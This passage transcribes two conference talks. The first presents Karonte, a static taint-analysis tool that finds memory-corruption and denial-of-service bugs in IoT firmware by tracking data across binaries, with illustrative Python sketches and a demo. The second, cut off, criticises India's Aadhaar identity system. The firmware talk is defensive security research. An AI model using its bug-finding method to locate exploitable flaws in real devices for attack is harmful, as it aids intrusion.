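    # getenv("QUERY_STRING") followed by a strcpy into a fixed-size buffer.
    data = os.environ.get("QUERY_STRING", "")
    if len(data) > 128:
        print(f"handler received {len(data)} bytes -> would overflow a 128-byte buffer")
    else:
        print(f"handler received {len(data)} bytes -> fits the buffer")

if __name__ == "__main__":
    if "--getter" in sys.argv:
        getter()
    else:
        setter("A" * 200)  # unconstrained path: longer than the 128-byte buffer

A single-binary analysis that looked only at the getter would have to assume the worst about QUERY_STRING; only by also looking at the setter can the analysis tell the dangerous flow from the benign one.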
So then we wondered how these different components actually communicate. They communicate through what is called inter-process communication (IPC), which is basically a finite set of paradigms used by binaries to communicate, such as files, environment variables, MMIO, and so forth. All these IPCs are represented by data keys, which are, for example, file names — or, in the earlier example, the QUERY_STRING environment variable. Each binary that relies on some shared data must know the endpoint where such data will be available — again, a file name, a socket endpoint, or the environment variable. This means that, usually, data keys are hard-coded in the program itself, as we saw before. Therefore, to find bugs in firmware in a precise manner, we need to track how user data is introduced and propagated across the different binaries. Okay, let's talk about our work. Before we start talking about Karonte, we define our threat model. We hypothesize that an attacker sends arbitrary requests over the network, both LAN and WAN, directly to the IoT device. Though we said before that sometimes IoT devices communicate through the cloud, research showed that some form of local communication is usually available, for instance during the setup phase of the device. Karonte is a static analysis tool that tracks data flow across multiple binaries to find vulnerabilities. Let's see how it works. In the first step, Karonte finds the binaries that introduce user input into the firmware. We call these border binaries: the binaries that interface the device to the outside world, which in our example is the web server. Then it tracks how data is shared with other binaries within the firmware sample — in this example it will understand that the web server communicates with the handler binary — and it builds what we call the BDG. A BDG, which stands for binary dependency graph, is basically a graph representation of the data dependencies among different binaries. Then we detect vulnerabilities that arise from the misuse of the data, using the BDG. This is another view of our system. We start by taking a packed firmware, we unpack it, we find the border binaries, then we build the binary dependency graph, which relies on a set of CPFs, as we will see soon — CPF stands for communication paradigm finder. Then we find the specifics of the communication, for instance the constraints applied to the data that is shared, through our multi-binary data-flow analysis module. Eventually, we run our insecure interaction detection module, which takes all this information and produces alerts. Our system is completely static and relies on our static taint engine. Let's see each of these steps in more detail. The unpacking procedure is pretty easy: we use the off-the-shelf firmware unpacking tool binwalk. Then we have to find the border binaries. We said that border binaries are binaries that receive data from the network, and we hypothesize that they contain parsers to validate the data they receive. In order to find them, we have to find parsers that accept data from the network and parse this data. To find parsers, we rely on related work, which uses a few metrics to quantify the likelihood that a function contains parsing capabilities. The metrics that we used are the number of basic blocks, the number of memory comparison operations, and the number of branches.
While these metrics identify parsers, we also have to determine whether a binary takes data from the network. As such, we define two more metrics: first, we check if the binary contains any network-related keywords, such as SOAP, HTTP, and so forth; then, we check if there exists a data flow between a read from a socket and a memory comparison operation. Once we have all these metrics for each function, we compute what we call a parsing score, which is basically a sum of products. Once we have a parsing score for each function in a binary, we represent the binary by its highest parsing score. Once we have that for each binary in the firmware, we cluster the binaries using the DBSCAN density-based clustering algorithm and consider the cluster with the highest parsing scores to contain the set of border binaries. After this, we build the binary dependency graph. Again, the binary dependency graph represents the data dependencies among the binaries in a firmware sample. For instance, this simple graph tells us that binary A communicates with binary C using files, and that the same binary A communicates with binary B using environment variables. Let's see how this works. We start from the identified border binaries, then we taint the data compared against the network-related keywords that we found, and run a static analysis to detect whether the binary relies on any IPC paradigm to share the data. If we find that it does, we establish whether the binary is a setter or a getter — that is, whether the binary sets the data to be consumed by another binary, or whether it gets the data and consumes it. Then we retrieve the employed data key, which in the earlier example was the keyword QUERY_STRING. Finally, we scan the firmware sample to find other binaries that might rely on the same data keys, and we schedule them for further analysis. To understand whether a binary relies on any IPC, we use what we call CPFs — communication paradigm finders. We designed a CPF for each IPC, and the CPFs are also used to find the same data keys within the firmware sample. We also provide Karonte with a generic CPF to cover those cases where the IPC is unknown, or where the vendor implemented its own version of some IPC — say, for example, they don't use setenv but implemented their own setenv. The idea behind this generic CPF, which we call the semantic CPF, is that data keys have to be used as an index to set or to get some data, as in this simple example. Let's see how the BDG algorithm works. We start from the border binary, which receives the server request and parses the URI. We see that here it runs a string comparison against some network-related keyword. As such, we taint the variable p, and we see that the variable p is returned from the function to these two different points. We continue, and now we see that data gets tainted, and the variable data is passed to the function setenv. At this point, the environment CPF recognizes that tainted data is set to an environment variable, and concludes that this binary is indeed a setter that uses the environment. Then we retrieve the data key QUERY_STRING, and we search within the firmware sample for all the other binaries that rely on the same data key. We find that this binary relies on the same data key, and we schedule it for further analysis. After this algorithm, we build the BDG by creating edges between setters and getters for each data key.
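As a rough illustration of the two steps just described — picking border binaries by parsing score and then linking setters to getters into a BDG — here is a minimal Python sketch. It is my own reconstruction, not Karonte's code: the metric weights, the DBSCAN parameters and the data structures are assumptions made for the example (numpy, scikit-learn and networkx are used).

# Minimal sketch of border-binary selection and BDG construction
# (illustrative weights/parameters, not Karonte's actual implementation).
import numpy as np
from sklearn.cluster import DBSCAN
import networkx as nx

def parsing_score(n_blocks, n_memcmp, n_branches, net_keywords, socket_flow,
                  weights=(1.0, 1.0, 1.0, 1.0, 1.0)):
    # "Sum of products": every metric contributes one weighted term to the score.
    metrics = (n_blocks, n_memcmp, n_branches, int(net_keywords), int(socket_flow))
    return sum(w * m for w, m in zip(weights, metrics))

def border_binaries(binary_scores, eps=0.5):
    # binary_scores: {binary: max parsing score over its functions}
    names = list(binary_scores)
    xs = np.array([binary_scores[n] for n in names], dtype=float).reshape(-1, 1)
    labels = DBSCAN(eps=eps, min_samples=1).fit(xs).labels_
    best = max(set(labels), key=lambda l: xs[labels == l].mean())
    return [n for n, l in zip(names, labels) if l == best]

def build_bdg(findings):
    # findings: (binary, role, ipc, data_key), e.g. ("httpd", "setter", "env", "QUERY_STRING")
    bdg = nx.MultiDiGraph()
    setters, getters = {}, {}
    for binary, role, ipc, key in findings:
        (setters if role == "setter" else getters).setdefault((ipc, key), set()).add(binary)
    for (ipc, key), srcs in setters.items():  # one edge setter -> getter per shared data key
        for src in srcs:
            for dst in getters.get((ipc, key), ()):
                bdg.add_edge(src, dst, ipc=ipc, data_key=key)
    return bdg

print(border_binaries({"httpd": 90.0, "busybox": 12.0, "upnpd": 85.0}))
print(build_bdg([("httpd", "setter", "env", "QUERY_STRING"),
                 ("handler.cgi", "getter", "env", "QUERY_STRING")]).edges(data=True))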
The multi-binary data-flow analysis uses the BDG to find and propagate the data constraints from a setter to a getter. Now, we propagate only the least strict constraints: between two program points there might be an infinite number of paths and, in theory, an infinite amount of constraints that we could propagate from the setter binary to the getter binary. But since our goal here is to find bugs, we only propagate the least strict set of constraints. Let's see an example. Again, we have our two binaries, and we see that the variable passed to the setenv function is data, which comes from two different paths in the parse_url function. In the first case, the data that is passed is unconstrained; in the second case, at line eight, it is constrained to be at most 128 bytes. As such, we only propagate the constraints of the first, unconstrained path. In turn, the getter binary will retrieve this variable from the environment and set the variable query, which in this case will be unconstrained. Then, the insecure interaction detection runs a static taint analysis and checks whether the data can reach a sink in an unsafe way. As sinks we consider memcpy-like functions — functions that implement semantically equivalent memory copies, such as strcpy, memcpy, and so forth. We raise alerts if we see a dereference of a tainted variable, and if we see comparisons of tainted variables in loop conditions, to detect possible denial-of-service vulnerabilities. Let's see an example again. We know that our query variable is tainted and unconstrained. Then we follow the taint into the function process_request, which, as we can see, will eventually copy the data from q into arg. We see that arg is 128 bytes long while q is unconstrained, and therefore we generate an alert here. Our static taint engine is based on BootStomp and is built entirely on symbolic execution, which means that the taint is propagated following the program's data flow. Let's see an example. Assume we have this code: the first instruction takes the result of some seed function that might return, for instance, some user input. In the symbolic world, what we do is create a symbolic variable ty and assign to it a tainted value that we call TAINT_y, which acts as the taint tag. The next instruction assigns x the value ty plus five. In the symbolic world, we just follow the data flow and x gets assigned TAINT_y plus five, which effectively taints x as well. If at some point x is overwritten with constant data, the taint is automatically removed. In its original design, inherited from BootStomp, the taint is also removed when the tainted variable is constrained: for instance, here we can see that the variable len is tainted, but then it is constrained between two values, zero and 255, and therefore the taint is removed. In our taint engine, we made two additions: we added a path prioritization strategy and we added taint dependencies. The path prioritization strategy prioritizes paths that propagate the taint and deprioritizes those that remove it. For instance, say again that some user input comes from some function and the variable user_input gets tainted. It is then passed to another function called parse. Here, as you can see, there is a potentially infinite number of symbolic paths through this while loop, but only one of them returns tainted data while the others do not. So the path prioritization strategy prioritizes this path over the others.
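For readers who want to map this onto an angr-style engine, here is a minimal Python sketch of the "taint tag as a named symbol" idea using claripy. It is my own illustration under the assumption that taint is encoded in symbol names; the TAINT_ prefix and the helper functions are made up for the example, and the real engine handles far more cases.

# Sketch: taint as a named symbolic variable, claripy-style (illustrative only).
import claripy

TAINT_PREFIX = "TAINT_"

def new_tainted(name, bits=32):
    # Fresh symbolic value whose name carries the taint tag, e.g. TAINT_y_<id>_32.
    return claripy.BVS(TAINT_PREFIX + name, bits)

def is_tainted(expr):
    # An expression is tainted if any symbol it contains carries the taint prefix.
    return any(v.startswith(TAINT_PREFIX) for v in expr.variables)

ty = new_tainted("y")        # y = seed()
x = ty + 5                   # x = y + 5  -> taint follows the data flow
print(is_tainted(x))         # True
x = claripy.BVV(0, 32)       # x = 0      -> overwritten with constant data
print(is_tainted(x))         # False: a concrete value carries no symbols

Untainting on re-assignment falls out naturally here, since a fresh concrete value carries no symbols; handling the constrained-length case (the len example above) would additionally require looking at the path constraints.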
The path prioritization has been implemented by finding the basic blocks within a function that return non-constant data: if one is found, we follow its return value before considering the others. Taint dependencies enable smart untainting strategies. Let's look at the example again. We know that user_input is tainted; it is then parsed, and we see that its length is computed and stored in a variable n. Its size is checked, and if it is greater than 512 bytes the function returns; otherwise it copies the data. Now, it might happen that, if this strlen function is not analyzed because of some static analysis imprecision, the taint tag of cmd ends up different from the taint tag of n. In that case, even though n gets untainted, cmd is not untainted, and this string copy can raise a false positive. To fix this problem, we create a dependency between the taint tag of n and the taint tag of cmd, and when n gets untainted, cmd gets untainted as well, so we no longer get that false positive. This procedure is automatic: we find functions that implement code semantically equivalent to strlen and create taint tag dependencies. Okay, let's see our evaluation. We ran three different evaluations over two different datasets: the first one composed of 53 recent firmware samples from 7 vendors, and the second one of 899 firmware samples gathered from related work. In the first case, the total number of binaries considered is about 8.5k — actually a bit more than that — and our system generated 87 alerts, of which 51 were found to be true positives, and 34 of them were multi-binary vulnerabilities, which means that the vulnerability was found by tracking the data flow from the setter to the getter binary. We also ran a comparative evaluation, in which we tried to measure the effort that an analyst would go through when analyzing firmware using different strategies. In the first one, we considered each and every binary in the firmware sample independently and ran the analysis for up to seven days per firmware. The system generated almost 21,000 alerts, considering only almost 2.5k binaries. In the second case, we found the border binaries — the parsers — and statically analyzed only them. The system generated 9.3k alerts; in this case, since we don't know how the user input is introduced in this experiment, we consider every IPC that we find in the binary as a possible source of user input, and this holds for all of these experiments. In the third case, we built the BDG but considered each binary independently, which means that we did not propagate constraints, and we ran a static single-binary analysis on each of them. The system generated almost 13,000 alerts.
For instance, we found that angr would take more than seven hours to build some CFGs, and sometimes the long run times were due to a high number of data keys. Also, as you can see from the second picture from the top, the number of paths does not have any impact on the total time, and as you can see from the bottom two pictures, performance is not heavily affected by firmware size, where by size we mean the number of binaries in a firmware sample and the total number of basic blocks. So let's see how to run Karonte. The procedure is pretty straightforward: first you get a firmware sample, then you create a configuration file containing information about the firmware sample, and then you run it. Let's see how. This is an example of a configuration file. It contains a few pieces of information, but most of them are optional. The only ones that are not are this one, the firmware path, which is the path to your firmware, and these two, the architecture of the firmware and the base address in case the firmware is a raw blob. All the other fields are optional, and you can set them if you have some information about the firmware. A full explanation of all of these fields is on our GitHub repo. Once you have set up the configuration file, you can run Karonte. We provide a Docker container; you can find the link on our GitHub repo. I am going to run it now, but it is not going to finish, because it takes several hours. All we have to do is run it on the configuration file, and it will perform each step that we saw. Eventually I will stop it, since it would take several hours anyway. In the end it produces a result file; I ran this yesterday, so you can see it here. There is a lot going on in there, and I will just go through the important information. One thing you can see is that these are the border binaries that Karonte found. Now, there might be some false positives among them, and I am not sure how many there are here, but as long as there are no false negatives, or their number is very low, it is fine. In this case, this one, httpd, is a true positive: it is the web server that we were talking about before. Then we have the BDG. In this case, we can see that Karonte found that httpd communicates with two different binaries, access.cgi and cgibin. Then we have information about the CPFs. For instance, we can see here that httpd has 28 data keys and that the semantic CPF found 27 of them; there might be one more somewhere that I do not see right now. Then we have the list of alerts. Now, some alerts might be duplicates because of loops. You can go ahead and inspect all of them manually, but I wrote a utility that you can use which basically filters out all the loop duplicates for you. Now I have to remember what I called it; this one here. And here you can see that in total the system generated, let me count, eight alerts. So let's look at one of them. I recently realized that the path that I am reporting in the log is not the full path from the setter binary through the getter binary to the sink, but only the part from the getter binary up to the sink. I am going to fix this in the next few days and report the whole path. Anyway.
So here we can see that the key Content-Type contains user input, and that it is exposed in an unsafe way to the sink at this address. The binary in question is called file_access.cgi, so we can look at what happens there. As you can see here, we have a string copy that copies the content of haystack to destination. Haystack basically comes from this getenv-like call, destination comes in as a parameter of this function, and this buffer is 0x68 bytes; and this turned out to be an actual true positive. Okay. So, in summary, we presented a strategy to track data flows across different binaries, and we evaluated our system on 952 firmware samples. Some takeaways: analyzing firmware is not easy, and bugs are likely to persist; firmware is made of interconnected components; static analysis can still be used to efficiently find vulnerabilities at scale; and finally, communication is key for precision. This is the bibliography that I used throughout the presentation, and now I am happy to take questions. Thank you, Nilo, for a very interesting talk. If you have questions, we have three microphones, one, two, and three. If you have a question, please go to a microphone and we will take it. Yes, microphone number two. Do you rely on imports from libc or something like that, or do you have issues with statically linked binaries, or is it all semantic analysis of a function? So, okay, we use angr. For example, if you have an indirect call, we use angr to figure out what the target is. And to answer your question, some CPFs do rely on libc. For instance, the environment CPF does, and it checks whether the setenv or getenv functions are called. But we also use a semantic CPF, which, in cases where information is missing, for example when there is no libc or some vendors reimplemented their own functions, tries to understand the semantics of the function and to recognize, for example, a custom setenv. Thanks. Microphone number three. In embedded environments you often also have the case that the getter works on DMA, some kind of vendor driver doing DMA. Are you considering this? And the second part of the question: how would you then distinguish this from your generic IPC? Because I can imagine that they look very similar in the actual code. So, if I understand your question correctly, you mentioned the case of MMIO, where some data is retrieved directly from some address in memory. What we found is that these addresses are usually hard-coded somewhere: the vendor knows that, for example, from address A to address B there is data from this peripheral. So when we find such a hard-coded address, we assume that this is a read of some interesting data. And this would be distinguishable from a DMA driver by using this fixed address, you mean? Yeah, that is what the semantic CPF does, among other things. Thank you. Another question from microphone number three. What is the license for Karonte? Sorry? I checked the software license; I checked the git repository and there is no license text at all. That is a good question. I have not thought about it yet. I will. Any more questions from here or from the internet? Okay, then a big round of applause for Nilo again. Great talk. Thank you.
Low-power, single-purpose embedded devices (e.g., routers and IoT devices) have become ubiquitous. While they automate and simplify many aspects of our lives, recent large-scale attacks have shown that their sheer number poses a severe threat to the Internet infrastructure, which led to the development of an IoT-specific cybercrime underground. Unfortunately, the software on these systems is hardware-dependent, and typically executes in unique, minimal environments with non-standard configurations, making security analysis particularly challenging. Moreover, most of the existing devices implement their functionality through the use of multiple binaries. This multi-binary service implementation renders current static and dynamic analysis techniques either ineffective or inefficient, as they are unable to identify and adequately model the communication between the various executables. In this talk, we will unveil the inner peculiarities of embedded firmware, we will show why existing firmware analysis techniques are ineffective, and we will present Karonte, a novel static analysis tool capable of analyzing embedded-device firmware by modeling and tracking multi-binary interactions. Our tool propagates taint information between binaries to detect insecure, attacker-controlled interactions, and effectively identify vulnerabilities. We will then present the results and insights of our experiments. We tested Karonte on 53 firmware samples from various vendors, showing that our prototype tool can successfully track and constrain multi-binary interactions. In doing so, we discovered 46 zero-day bugs, which we disclosed to the responsible entities. We performed a large-scale experiment on 899 different samples, showing that Karonte scales well with firmware samples of different size and complexity, and can effectively and efficiently analyze real-world firmware in a generic and fully automated fashion. Finally, we will demo our tool, showing how it led to the detection of a previously unknown vulnerability. Presentation Outline 1. Introduction to IoT/Embedded firmware [~7 min] * A brief intro to the IoT landscape and the problems caused by insecure IoT devices. * Overview of the peculiarities that characterize embedded firmware. * Strong dependence from custom, unique environments. * Firmware samples are composed of multiple binaries, in a file system fashion (e.g., SquashFS). * Example of how a typical firmware sample looks like. 2. How to Analyze Firmware? [~5 min] * Overview on the current approaches/tools to analyze modern firmware and spot security vulnerabilities. * Description of the limitations of the current tools. * Dynamic analysis is usually unfeasible, because of the different, customized environments where firmware samples run. * Traditional, single-binary static analysis generates too many false positives because it does not take into account the interactions between the multiple binaries in a firmware sample. 3. Modeling Multi-Binary Interactions [~5 min] * Binaries/processes communicate through a finite set of communication paradigms, known as Inter-Process Communication (or IPC) paradigms. * An instance of an IPC is identified through a unique key (which we term a data key) that is known by every process involved in the communication. * Data keys associated with common IPC paradigms can be used to statically track the flow of attacker-controlled information between binaries. 4. 
Karonte: Design & Architecture [~15 min] * Our tool, Karonte, performs inter-binary data-flow tracking to automatically detect insecure interactions among binaries of a firmware sample, ultimately discovering security vulnerabilities (memory-corruption and DoS vulnerabilities). We will go through the steps of our approach. * As a first step, Karonte unpacks the firmware image using the off-the-shelf firmware unpacking utility binwalk. * Then, it analyzes the unpacked firmware sample and automatically retrieves the set of binaries that export the device functionality to the outside world. These border binaries incorporate the logic necessary to accept user requests received from external sources (e.g., the network), and represent the point where attacker-controlled data is introduced within the firmware itself. * Given a set of border binaries, Karonte builds a Binary Dependency Graph (BDG) that models communications among those binaries processing attacker-controlled data. The BDG is iteratively recovered by leveraging a collection of Communication Paradigm Finder (CPF) modules, which are able to reason about the different inter-process communication paradigms. * We perform static symbolic taint analysis to track how the data is propagated through the binary and collect the constraints that are applied to such data. We then propagate the data with its constraints to the other binaries in the BDG. * Finally, Karonte identifies security issues caused by insecure attacker-controlled data flows. 5. Evaluation & Results [~10 min] * We leveraged a dataset of 53 modern firmware samples to study, in depth, each phase of our approach and evaluate its effectiveness to find bugs. * We will show that our approach successfully identifies data flows across different firmware components, correctly propagating taint information. * This allowed us to discover potentially vulnerable data flows, leading to the discovery of 46 zero-day software bugs, and the rediscovery of another 5 n-days bugs. * Karonte provided an alert reduction of two orders of magnitude and a low false-positive rate. * We performed a large-scale experiment on 899 different firmware samples to assess the scalability of our tool. We will show that Karonte scales well with firmware samples of different size and complexity, and thus can be used to analyze real-world firmware. 6. Demo of Karonte [~5 min] * We will show how Karonte analyzes a real-world firmware sample and detects a security vulnerability that we found in the wild. * We will show the output that Karonte produces and how analysts can leverage our tool to test IoT devices. 7. Conclusive Remarks [~3 min] * A reprise of the initial questions and summary of the takeaways.
10.5446/53141 (DOI)
The previous talk was overwhelmingly depressing: it dealt with the CIA illegally spying on people and Julian Assange being under constant surveillance, and you would think it cannot possibly get worse. But it can, because our next speaker is going to tell you about systems for the collection of biometric data and digital identities, and how they can potentially make lives worse, not just for dozens of people but for hundreds of millions or billions of people. So let's hear it for Kiran Jonnalagadda. Yes: unpacking the compromises of Aadhaar and other digital identities inspired by it. Kiran is a founder of the Kaarana project, an organization examining identity programs. So he's going to tell us about the most depressing thing you're going to hear in this room today. Thank you. Thank you. Thanks everyone, I'm glad to be here. So let's get started. Well, as always, these things start with an origin story. In the beginning we did not have identity cards; everybody knew you by your name or by your face. Then things got a little complicated and we got ID papers, and before long this was a meme. (Where are we? Okay, come on. Technology doesn't like working, and it doesn't want to work. Yes.) So, we are hackers. We like to think all problems can be solved by hacking, and a decade ago, in 2009, in India, some of our kind looked at this ID-paper problem and thought there has got to be a better way. I mean, why do papers have a life of their own? What happens if you lose your papers? Do you not have an identity anymore? What happens if your papers are confiscated? Does that change who you are as a person? And how do we think about this in a better way? For inspiration you can go back to the Voyager spacecraft. When the Voyager spacecraft left Earth for outer space, it carried this image on it. Now, this is the aliens' edition of showing ID papers: who are you? Humans. If this is good for outer space, then why can't we do something like this on Earth? And so these people started asking: why do you need to see my ID? You can see me. My body is my ID. This is nice, but bodies can't go online, so you need to somehow extract the soul from your body and take it online, and this is not an idle reference. This is in fact how they think about it, and this is the statement that they make explaining how they think about it: that your soul, your atma, can be uploaded into the cloud and then exist online. And how do you do this? Well, the approach they took was to collect all your biometrics. They take your photograph, they take your fingerprints, all ten fingers, they take two iris scans, and they give you an Aadhaar, which means foundation, and which is supposed to be the foundation of the rest of your life. This is quite literally, in their vision, how you now enter cyberspace. Now, if they want so much data from you, what more could they possibly want? This is something that worried a judge of the Supreme Court of India, who went on to ask: well, are you going to do this next? At this point you're wondering: is this satire, or is this science fiction? Well, nope: the database they have built has 1.25 billion entries in it, and this is how they announced that number, with a Christmas greeting. So where do they keep this data? As computer programmers we often struggle to explain technical concepts to a non-technical audience, and this is sort of what happened in the Supreme Court of India when a case against Aadhaar was being heard last year. The Attorney General, Mr.
K.K. Venugopal, who was 87 years old at that time, explained data storage to the justices of the Supreme Court, explaining that the data is stored behind walls that are 13 feet high and 5 feet thick, and therefore it is safe. As you can expect, the public found this very funny, and since then the 13-foot wall has been a meme in India. What are you doing? Well, it's behind the 13-foot wall, so nothing to worry about. But this isn't just about jokes. We can go back to Arthur C. Clarke, who made this statement: any sufficiently advanced technology is indistinguishable from magic. Your average person does not understand how technology works, so to them technology is magic, and this essentially means that we hackers, who understand technology, are society's magicians. You've got a magic wand, you wave it, and problems are solved. This is how people think this is supposed to work, but we know better. We actually know how technology works, we know when technology does not work, and it is imperative on us to call it out. That's what I'm here for today: to explain to you why this technology does not work and what we need to be doing about it. So let's start with the basics. What does Aadhaar actually collect? This is the rough database structure. They collect biometrics and they collect demographics. The biometrics are classified into two components. The core biometrics, which are your fingerprints and your iris scans, are considered extremely confidential data and will never be shared; that's the mandate that they offer. But your photograph, which is also a biometric, can be shared, because it is, after all, what goes onto an identity card. The other part is the demographics. They collect your name; your date of birth, if it is known (a lot of people in India do not know when they were born); your gender, and you can declare yourself as transgender, that's accepted in the Aadhaar system; and then they collect a postal address. This information is what you submit when you enrol. Your biometrics are then sent for deduplication against the entire database, so against the billion-plus records already in there. If you enrol today, they will compare your biometrics with every single record already in the database to confirm that you are not already enrolled. This is a process that takes roughly 45 days; that's how long it takes for them to confirm that you are a new enrollee, and you then have an Aadhaar number that's guaranteed unique. Anybody can apply; the only requirement is that you are physically present in India. The law says you have to have been there for 180 days, but nobody checks, so you can just walk into any Aadhaar enrolment centre, sign up, and you will have an ID. The number, when it is assigned to you, is sent to you by post; you do not get notified online. And the letter that they send you, which looks like this, is essentially the way they finally confirm that your address is actually real, because if this was your address, you are supposed to receive the card, and therefore your proof of address is confirmed. This, as you can expect, is a serious problem for migrant workers, who cannot guarantee where they are going to be when the letter arrives, but we'll get to that later. So, the APIs that are available. There are three basic APIs. There is a demographic identification API, which is unfortunately and mistakenly called an authentication API even though it's not.
What you do with this API is: if you're calling the API, you submit an Aadhaar number and you submit a piece of demographic information, like saying, this Aadhaar number and this name, do they match? And you get a yes-or-no answer. You do not get any information back. Or you can do this with fingerprint authentication: you actually upload a scanned fingerprint and an Aadhaar number and ask whether these match, and you get a yes or no. Or, if you cannot take a fingerprint for whatever reason, you can ask for a one-time password to be sent to the phone number that has been registered. You get a six-digit number, you submit that number and the Aadhaar number and ask whether they match, and then you have verified that somebody gave you the right one-time password and therefore authenticated to their account. All three of these APIs do not give you any information from the database. There is another one, the electronic Know Your Customer (eKYC) API, which is used for ID checks by institutions like banks, and there you do get the information back, but we'll get into that again later. Now, if you take just this minimalist API, there is very little data collection apart from biometrics, very little demographic collection, and nothing is ever written back outside of the KYC API. So, on the basis of this minimalism, the Unique Identification Authority of India claims that Aadhaar cannot be used for surveillance, because it does not know anything. This is a public claim that they repeatedly make. Except for one little detail: the Aadhaar number itself is now a universal foreign key, because that's what you use to authenticate with Aadhaar into some other database, and who runs those databases? As it turns out, most of them are run by the government again. So if you have a government that is really interested in surveillance, and a department of the government runs an ID program which it claims cannot be used for surveillance, what does the government do when it really wants to use it for surveillance? It makes it mandatory for everything. And that gets you a situation where Aadhaar is officially voluntary but in practice mandatory, which leads to the next meme in India: Aadhaar is voluntarily mandatory. So let's look at what it is mandatory for. It is mandatory to collect any welfare benefit. It is mandatory if you want to pay tax, or rather file your tax returns; I mean, nobody will ever dare say 'we will not take your tax money'. To file your tax return you need Aadhaar. If you do not earn enough to file taxes and you collect welfare, you need Aadhaar, so that's like everybody's covered. To get a birth certificate for a newborn baby, you need an Aadhaar for the baby. To get a death certificate for someone who has died, you need an Aadhaar number for the person who died. If you want to get married, well, both parties have to provide an Aadhaar number. And at this point it's like, what's left? Who is it optional for? Now, the death certificate part is interesting. How do you verify the Aadhaar number of a dead person? You can't take the fingerprints; the dead can't consent, apart from the fact that the technology stops working once the body gets cold. You can't send a one-time password to a dead person's mobile phone, because that's indistinguishable from theft: my phone has been stolen and somebody declared me dead. Is that acceptable? So they in fact do not have any authentication for dead people. Someone's dead, you can't get a death certificate without providing an Aadhaar number, and, well, they didn't sign up for Aadhaar in their lifetime, so what are you going to do now?
You just submit any random number. Sometimes you submit your own number, sometimes the coroner submits their number. And so what you get here is your first instance of a database that is supposed to be biometrically secure and authenticated completely failing to do its job, because this is a use case that was simply not considered. Okay, and this is not unusual. The APIs I just described require a license, and that license is almost impossible to get. So what do most people do? Well, they just take an Aadhaar number and put it in their database; they don't bother to verify anything about it. So part of what happens here is that in the implementation of Aadhaar there is a recurring confusion between three very different concepts: identification, authentication and authorization. The fact that you can accept my ID and confirm it is legitimate is not the same thing as confirming that I am the holder of that identification, and it is not the same thing as me saying I am okay with you doing something in my name. These are three different things. I'll give an example of where this can go massively wrong. In 2017 the telecom regulator issued an order asking telecom companies to authenticate all of their customers, to make sure there were no SIM cards issued to people whose identity was not known. So they forced an exercise across the country, asking telecom operators to go find their customers and get them to authenticate with Aadhaar. Now, telecom companies have become so big in India that they are turning into banks, and so this happened with one of them: after this exercise, a lot of people started complaining that they were not receiving welfare benefits anymore. You authenticated your phone connection and your welfare stopped; what happened? This turned into a bit of a scandal, and eventually we discovered what had happened: all of these people had new bank accounts opened for them that they did not know existed, and the welfare money was going to the new bank account. Here is how much the total fraud was, and this is just one telecom operator. The telecom operator had obtained a banking license and was desperate for customers, so when you went to authenticate your phone connection, they used that authentication as authorization to open a bank account and reroute your subsidy money, and you would not even have been aware of that. So this scam essentially stole 1.9 billion rupees from 310,000 individuals, for one telecom operator alone; and I think that number is wrong, it's not 310,000, it's 3.1 million, I'm off by one zero. So how do you make a mistake this fundamental in your design? For this you have to go back to what the Attorney General said. On the same day that he said that the data is protected by a 13-foot wall, he also went on to explain what the whole point of Aadhaar was, and as you can see, the assumption made in Aadhaar is that the individual is fraudulent unless they prove that they are not. That is the fundamental design assumption of Aadhaar. So what it has essentially done is very carefully replace your rights as a citizen with privileges granted by the state for good behaviour, and that should have been a violation of the constitution. It takes people a while to realise that this is a very subtle change they made: you were entitled to welfare under the constitution of India, and it was the state's responsibility to give it to you if you deserved it, but what they did was flip it around and say you have to be the person who proves your legitimacy to receive what is
actually due to you. Okay. And they have a term for this: they call it the self-cleaning database. This is a reference I found in a book, the first time I found an explanation of how they thought about this. Essentially, for the state to uphold your rights requires considerable resources on the part of the state, and if the state is running a budget deficit, well, they're not going to deliver on your rights as they're supposed to. This is the fundamental problem of most developing economies: you may have rights, but the state doesn't get to give them to you because it lacks the capacity. So what Aadhaar does to solve the problem is to say: well, if the state can't do its thing, you must do it as a citizen. It is your duty as a citizen now to behave like a good citizen and show the state that you are keeping your data clean. And this is not a wayward reference; this is not just an author in a book pointing it out. In fact, this is how the state explains it in the Parliament of India: the Aadhaar system has a mechanism of self-cleaning the data during the course of time. So what happens when you run a system like this on people? If you insist that to collect your subsidies, to collect your rations, which is food, your rationed food, you must authenticate biometrically, and the technology does not work for whatever reason, your fingerprints don't scan, there is no cell phone connection, something else has gone wrong, what do you do? Well, it goes to bizarre extents. This is a news story where a remote village in India did not have a good mobile connection, but somebody discovered that at the top of a tree there was an Internet connection, and so they put a fingerprint scanner on the tree, and now you climb up and put your finger there, and only then are you given food. This is one example, but obviously there are lots of these. So what happens if people can't do this at all? This is a compilation of reports of how many people have died because the technology failed. These numbers have been growing. Fortunately, last year the Supreme Court insisted that if the technology doesn't work it is not the citizen's fault, and an alternative must be provided. I don't know what the current numbers are; I don't expect they're much better than this. It's probably as dismal as it is because the state really has no interest in upholding rights. So, ironically enough, the database design has no feature for reporting a death. Their official FAQ says: somebody related to me has died, how do I report it? And they say: well, we don't know how to record a death, so just ignore it. So what happens to dead people? You know, we started this talk with how your soul, your atma, is uploaded into the cloud; as it turns out, you now become a ghost in the system and you continue to exist as a fictional entity in a database, because they do not know how to record that you have died. This URL has a list of possibilities and problems that arise out of the fact that they do not record a death. Okay, so why are they doing all these things? What is the logical purpose, what is it supposed to do? It's supposed to fix a corruption problem in welfare distribution by ensuring subsidies are not misrouted and delivered to someone who did not deserve a subsidy. The way they do this, and this is an employee manual from 2014, this is the next trick: the basic idea, which is part of the training for government employees, is that you must record an Aadhaar number for every person in your database. So if you have, say, a hundred million
welfare recipients, you are required to collect a hundred million Aadhaar numbers. How do you do this? Well, you can go door to door and collect everybody's numbers, or you can do what's called inorganic seeding; they use the term seeding to describe the act of collecting Aadhaar numbers. So they have what's called organic seeding, where the beneficiary comes to you and says here's my Aadhaar number, and then they have inorganic seeding, where you take it without their consent. Okay, it's in the manual. They also claim this is foolproof, because beneficiaries who are claiming benefits in the names of others, such persons will not be able to authenticate themselves; after all, you're supposed to do a biometric authentication before you take their name into the database. But when you're doing it inorganically, you're not doing a biometric authentication, and so what happens there? They also point out that it is possible for the government employee to get it wrong, and they just accept that as a fact of life. So essentially, thumbs up to the state, thumbs down to the citizen. That's the design. And of course, bullying a person into compliance is not the same thing as technology that actually works, and fraud exists as a violation of the technology itself. Here's a case where an Aadhaar number was issued to a god. The letter was printed, it was dispatched, and the postman had to return it saying: I do not know where to deliver this. So how does this happen? As it turns out, the hackers who built this, who are so proud of their biometric deduplication, completely forgot about document verification, and you can submit a real person's 